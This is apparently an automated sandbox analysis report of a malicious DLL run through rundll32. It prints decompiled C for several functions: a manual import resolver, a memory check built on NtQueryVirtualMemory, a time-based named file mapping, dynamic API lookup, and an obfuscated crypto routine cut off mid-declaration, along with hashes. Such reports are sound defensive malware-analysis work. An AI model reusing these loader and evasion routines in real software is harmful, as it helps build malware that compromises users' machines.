Instruction ID: 85c0868463d14858f17c42858624fe0a32704ce5df48730f043fd2a385afc03a
Opcode Fuzzy Hash: ad5392e4f8523c6bff8dabd249a7cc4530ce31fe89c4eb97e7685ee26d633860
Instruction Fuzzy Hash: 69F0C2B06492309AF701DF68ADC57C53BE8E7097D2F028215E244D61ECDBB085818B5C

Uniqueness

Uniqueness Score: -1.00%

Function 10001745, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001745(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x1000414c;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x10001745
0x1000174e
0x10001753
0x10001759
0x10001762
0x10001768
0x1000176a
0x1000176d
0x10001772
0x10001779
0x10001779
0x1000177d
0x10001785
0x10001788
0x00000000
0x00000000
0x1000178e
0x10001798
0x1000179a
0x1000179d
0x100017a0
0x100017a4
0x100017ac
0x100017ae
0x100017b1
0x10001819
0x10001819
0x1000181d
0x00000000
0x00000000
0x100017b6
0x100017bc
0x100017be
0x100017d1
0x100017d4
0x100017d4
0x100017d4
0x100017d8
0x100017c0
0x100017c0
0x100017c8
0x100017ca
0x00000000
0x00000000
0x00000000
0x00000000
0x100017ca
0x100017b8
0x100017b8
0x100017cc
0x100017cc
0x100017cc
0x100017db
0x100017de
0x100017e0
0x100017e7
0x100017e2
0x100017e2
0x100017e2
0x100017ef
0x100017f5
0x100017f7
0x10001827
0x100017f9
0x100017f9
0x100017fc
0x100017fe
0x10001806
0x10001806
0x1000180b
0x1000180d
0x10001814
0x10001816
0x10001816
0x10001816
0x00000000
0x10001816
0x00000000
0x100017f7
0x100017a6
0x100017a8
0x100017aa
0x00000000
0x00000000
0x100017aa
0x1000182a
0x1000182a
0x10001831
0x10001836
0x00000000
0x00000000
0x1000183c
0x10001847
0x00000000
0x10001847
0x1000183e
0x1000183e
0x10001844
0x00000000
0x10001844
0x10001772
0x10001848
0x1000184d

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 1000177D
GetProcAddress.KERNEL32(?,00000000), ref: 100017EF

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 44a8695f59bde02a6b04981e26f2814c296b5372f7ca6d95004bada70fc4ba09
Instruction ID: c607def5a2bc0e5299d97bb95015c1db0b928527211c0f3006954d548cbcd348
Opcode Fuzzy Hash: 44a8695f59bde02a6b04981e26f2814c296b5372f7ca6d95004bada70fc4ba09
Instruction Fuzzy Hash: 78313675A0420A9FEB55CF99C880AEEB7F8FF04384F258069D805E7248EB70DA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10002375, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002375(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10004178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x100041c0 = 1;
										__eflags =  *0x100041c0;
										if( *0x100041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x10004178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x100041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10004178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1000417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x100041c0 = 1;
							__eflags =  *0x100041c0;
							if( *0x100041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x100041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10004178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x1000237f
0x10002382
0x10002388
0x100023a6
0x00000000
0x100023a6
0x10002390
0x10002399
0x1000239f
0x100023ae
0x100023b1
0x100023b4
0x100023be
0x100023be
0x100023c0
0x100023c3
0x100023c5
0x100023c5
0x100023c7
0x100023ca
0x00000000
0x00000000
0x100023cc
0x100023ce
0x10002434
0x10002434
0x10002592
0x00000000
0x10002592
0x100023d0
0x100023d0
0x100023d4
0x100023d6
0x100023d6
0x100023d6
0x100023d6
0x100023d9
0x100023da
0x100023dd
0x100023dd
0x100023e1
0x100023e5
0x100023f3
0x100023f3
0x100023fb
0x10002401
0x10002403
0x10002405
0x10002415
0x10002422
0x10002426
0x1000242b
0x1000242d
0x100024ab
0x100024ab
0x1000242f
0x1000242f
0x1000242f
0x100024ad
0x100024af
0x10002590
0x10002590
0x00000000
0x100024b5
0x100024b5
0x100024bc
0x00000000
0x00000000
0x100024c2
0x100024c6
0x10002522
0x10002524
0x1000252c
0x1000252e
0x10002530
0x00000000
0x00000000
0x10002532
0x10002538
0x1000253a
0x1000253c
0x10002551
0x10002551
0x10002553
0x10002582
0x10002589
0x00000000
0x10002589
0x10002557
0x10002558
0x1000255a
0x1000255c
0x1000255c
0x1000255e
0x10002560
0x10002562
0x10002576
0x10002576
0x10002579
0x1000257b
0x1000257b
0x1000257c
0x1000257c
0x00000000
0x10002564
0x10002564
0x10002564
0x1000256d
0x1000256e
0x10002570
0x10002572
0x10002572
0x00000000
0x10002564
0x10002562
0x1000253e
0x10002545
0x10002545
0x10002547
0x00000000
0x00000000
0x10002549
0x1000254a
0x1000254d
0x1000254f
0x00000000
0x00000000
0x00000000
0x1000254f
0x00000000
0x10002545
0x100024c8
0x100024cb
0x100024d0
0x00000000
0x00000000
0x100024d9
0x100024db
0x100024e1
0x00000000
0x00000000
0x100024e7
0x100024ed
0x00000000
0x00000000
0x100024f3
0x100024f5
0x100024fe
0x10002502
0x00000000
0x00000000
0x10002508
0x1000250b
0x1000250d
0x00000000
0x00000000
0x10002514
0x10002516
0x00000000
0x00000000
0x10002518
0x1000251c
0x00000000
0x00000000
0x00000000
0x1000251c
0x00000000
0x00000000
0x00000000
0x10002407
0x10002407
0x10002407
0x1000240e
0x00000000
0x00000000
0x10002410
0x10002411
0x10002413
0x00000000
0x00000000
0x00000000
0x10002413
0x1000243b
0x1000243d
0x00000000
0x00000000
0x1000244d
0x1000244f
0x10002451
0x00000000
0x00000000
0x10002457
0x1000245e
0x1000248a
0x1000248a
0x1000248c
0x1000248e
0x100024a2
0x100024a4
0x00000000
0x00000000
0x00000000
0x00000000
0x10002490
0x10002490
0x10002490
0x10002499
0x1000249a
0x1000249c
0x1000249e
0x1000249e
0x00000000
0x10002490
0x10002460
0x10002463
0x10002465
0x10002477
0x10002477
0x1000247a
0x1000247c
0x1000247c
0x1000247d
0x1000247d
0x10002483
0x00000000
0x00000000
0x00000000
0x00000000
0x10002467
0x10002467
0x10002467
0x1000246e
0x00000000
0x00000000
0x10002470
0x10002470
0x10002471
0x00000000
0x00000000
0x00000000
0x10002471
0x10002473
0x10002475
0x10002488
0x00000000
0x00000000
0x00000000
0x10002488
0x00000000
0x10002475
0x100023e7
0x100023ea
0x100023ed
0x00000000
0x00000000
0x100023ef
0x100023f1
0x00000000
0x00000000
0x00000000
0x100023f1
0x100023b6
0x100023b8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002426

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: bc62919f775303453252f92297d23a638608a8d642d2c7d4ab03d1755088ac9f
Instruction ID: 0c254990f4eddd9df484f3b683da5194678d0c4feb8b8adbfe3d5bca3f7d4cb2
Opcode Fuzzy Hash: bc62919f775303453252f92297d23a638608a8d642d2c7d4ab03d1755088ac9f
Instruction Fuzzy Hash: 3861E170A00A52DFFB19CF28CCE065937E5EB893D5F628439D856C729DEB30DD828A54

Uniqueness

Uniqueness Score: -1.00%

Function 10002154, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E10002154(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E100022BB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E10002375(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E10002260(_t55, _t66);
										_t89 = _t66 + 0x10;
										E100022BB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E10002357(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x10002158
0x10002159
0x1000215a
0x1000215d
0x1000215f
0x10002162
0x10002163
0x10002165
0x10002166
0x10002167
0x1000216a
0x10002174
0x10002225
0x1000222c
0x10002235
0x1000217a
0x1000217a
0x10002180
0x10002186
0x10002189
0x1000218c
0x10002190
0x10002195
0x1000219a
0x1000221a
0x00000000
0x1000219c
0x1000219c
0x100021a8
0x100021aa
0x10002205
0x10002205
0x1000220b
0x00000000
0x100021ac
0x100021bb
0x100021bd
0x100021be
0x100021bf
0x100021c2
0x100021c2
0x100021c4
0x00000000
0x100021c6
0x100021c6
0x10002210
0x100021c8
0x100021c8
0x100021cc
0x100021d4
0x100021d9
0x100021de
0x100021ea
0x100021f2
0x100021f9
0x100021ff
0x10002203
0x00000000
0x10002203
0x100021c6
0x100021c4
0x00000000
0x100021aa
0x1000221e
0x1000221e
0x1000221e
0x1000219a
0x1000223a
0x10002241

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 9c57574405240a8165450f76d07df83800bb314007ae7cce2d6078ed4837daf0
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 6521CB76900204AFD710DFA8CCC09A7F7A5FF49390B468158DD599B249D730FA25CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 1000102F, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002100();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x10004150;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L100020FA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x10004140, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x1000102f
0x10001038
0x1000103c
0x10001042
0x10001047
0x1000104c
0x1000104f
0x10001052
0x10001057
0x10001058
0x1000105b
0x10001066
0x1000106d
0x10001071
0x10001073
0x10001074
0x10001077
0x1000107c
0x10001086
0x10001088
0x10001088
0x100010a2
0x100010a6
0x100010f6
0x100010a8
0x100010b1
0x100010c7
0x100010cf
0x100010e1
0x100010e5
0x00000000
0x00000000
0x100010d1
0x100010d4
0x100010d9
0x100010db
0x100010db
0x100010bc
0x100010be
0x100010e7
0x100010e8
0x100010e8
0x100010b1
0x100010fe

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 1000103C
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001052
_snwprintf.NTDLL ref: 10001077
CreateFileMappingW.KERNEL32(000000FF,10004140,00000004,00000000,?,?), ref: 1000109C
GetLastError.KERNEL32 ref: 100010B3
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 100010C7
GetLastError.KERNEL32 ref: 100010DF
CloseHandle.KERNEL32(00000000), ref: 100010E8
GetLastError.KERNEL32 ref: 100010F0

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 659c6e22773efc5d4acf18c79085ac1006ba0f018220d8c2180b8ead122f5ef9
Instruction ID: fd2cfec1e864bf63db9aaa2ee4e5368c07c46789b5c4626883214d07a46f71c5
Opcode Fuzzy Hash: 659c6e22773efc5d4acf18c79085ac1006ba0f018220d8c2180b8ead122f5ef9
Instruction Fuzzy Hash: 6821CFB2500258BFE721EFA8CCC4EDE77ADEB483D0F118136F615D7159DAB099858BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001A0F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E10001DE1(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x10004150 + 0x10005014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x10004150 + 0x10005151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E10001DFC(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x10004150 + 0x10005161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x10004150 + 0x10005174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x10004150 + 0x10005189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x10004150 + 0x1000519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E10001EB5(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x10001a1d
0x10001a21
0x10001ae2
0x10001a27
0x10001a3f
0x10001a4e
0x10001a55
0x10001a59
0x10001a5c
0x10001ada
0x10001adb
0x10001a5e
0x10001a6b
0x10001a6f
0x10001a72
0x00000000
0x10001a74
0x10001a81
0x10001a85
0x10001a88
0x00000000
0x10001a8a
0x10001a97
0x10001a9b
0x10001a9e
0x00000000
0x10001aa0
0x10001aad
0x10001ab1
0x10001ab4
0x00000000
0x10001ab6
0x10001abc
0x10001ac2
0x10001ac7
0x10001ace
0x10001ad1
0x00000000
0x10001ad3
0x10001ad6
0x10001ad6
0x10001ad1
0x10001ab4
0x10001a9e
0x10001a88
0x10001a72
0x10001a5c
0x10001af0

APIs

Part of subcall function 10001DE1: HeapAlloc.KERNEL32(00000000,?,10001556,00000208,00000000,00000000,?,?,?,100016A9,?), ref: 10001DED

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001E4D,?,?,?,?,?,00000002,?,10001401), ref: 10001A33
GetProcAddress.KERNEL32(00000000,?), ref: 10001A55
GetProcAddress.KERNEL32(00000000,?), ref: 10001A6B
GetProcAddress.KERNEL32(00000000,?), ref: 10001A81
GetProcAddress.KERNEL32(00000000,?), ref: 10001A97
GetProcAddress.KERNEL32(00000000,?), ref: 10001AAD

Part of subcall function 10001EB5: memset.NTDLL ref: 10001F34

Memory Dump Source

Source File: 00000001.00000002.628232837.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.628205124.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.628285347.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: 4ec88815e77cd39fd923d72db13d571f8939319d025cdf8bbff59f143bb65112
Instruction ID: 8e690bc40ad544dced62eb57c6a0da5a983291de411777cdb34876cf766fb635
Opcode Fuzzy Hash: 4ec88815e77cd39fd923d72db13d571f8939319d025cdf8bbff59f143bb65112
Instruction Fuzzy Hash: 5F2117B1601B1AAFE750DFA9DC84EDB7BECEF493C07024466E905C7219EB31E9018B61

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4992 Parent PID: 5584 rundll32.exeCOMMON

Executed Functions

Function 023D5F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E023D5F16(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edi;
				signed int _t610;
				void* _t612;
				signed int _t613;
				intOrPtr _t619;
				void* _t626;
				void* _t628;
				void* _t630;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t638;
				void* _t640;
				intOrPtr _t641;
				signed int _t644;
				void* _t646;
				signed int _t647;
				signed int _t650;
				signed int _t652;
				signed int _t653;
				intOrPtr _t656;
				signed int _t658;
				signed int _t661;
				signed int _t665;
				void* _t667;
				signed int _t668;
				signed int _t671;
				signed int _t675;
				signed int _t677;
				void* _t679;
				signed int _t680;
				signed int _t682;
				signed int _t684;
				signed int _t689;
